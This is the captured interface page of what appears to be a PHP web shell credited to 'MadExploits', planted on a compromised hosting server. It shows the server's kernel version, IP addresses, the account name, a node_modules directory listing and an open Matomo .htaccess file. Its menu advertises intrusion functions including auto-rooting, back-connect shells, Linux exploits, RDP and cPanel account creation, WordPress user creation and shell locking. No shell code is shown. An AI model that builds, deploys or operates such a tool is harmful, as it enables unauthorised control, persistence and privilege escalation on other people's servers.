Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.221.165.190
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
node_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
angular
[ DIR ]
drwxr-xr-x
angular-animate
[ DIR ]
drwxr-xr-x
angular-cookies
[ DIR ]
drwxr-xr-x
angular-mocks
[ DIR ]
drwxr-xr-x
angular-sanitize
[ DIR ]
drwxr-xr-x
chroma-js
[ DIR ]
drwxr-xr-x
iframe-resizer
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
jquery-mousewheel
[ DIR ]
drwxr-xr-x
jquery-ui-dist
[ DIR ]
drwxr-xr-x
jquery.browser
[ DIR ]
drwxr-xr-x
jquery.dotdotdot
[ DIR ]
drwxr-xr-x
jquery.scrollto
[ DIR ]
drwxr-xr-x
materialize-css
[ DIR ]
drwxr-xr-x
mousetrap
[ DIR ]
drwxr-xr-x
ng-dialog
[ DIR ]
drwxr-xr-x
qrcodejs2
[ DIR ]
drwxr-xr-x
sprintf-js
[ DIR ]
drwxr-xr-x
visibilityjs
[ DIR ]
drwxr-xr-x
vue
[ DIR ]
drwxr-xr-x
.htaccess
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# This file is auto generated by Matomo, do not edit directly # Please report any issue or improvement directly to the Matomo team. # First, deny access to all files in this directory <Files "*"> <IfModule mod_version.c> <IfVersion < 2.4> Order Deny,Allow Deny from All </IfVersion> <IfVersion >= 2.4> Require all denied </IfVersion> </IfModule> <IfModule !mod_version.c> <IfModule !mod_authz_core.c> Order Deny,Allow Deny from All </IfModule> <IfModule mod_authz_core.c> Require all denied </IfModule> </IfModule> </Files> # Serve HTML files as text/html mime type - Note: requires mod_mime apache module! <IfModule mod_mime.c> AddHandler text/html .html AddHandler text/html .htm </IfModule> # Allow to serve static files which are safe <Files ~ "\.(gif|ico|jpg|png|svg|js|css|htm|html|mp3|mp4|wav|ogg|avi|ttf|eot|woff|woff2)$"> <IfModule mod_version.c> <IfVersion < 2.4> Order Allow,Deny Allow from All </IfVersion> <IfVersion >= 2.4> Require all granted </IfVersion> </IfModule> <IfModule !mod_version.c> <IfModule !mod_authz_core.c> Order Allow,Deny Allow from All </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </IfModule> </Files>
Close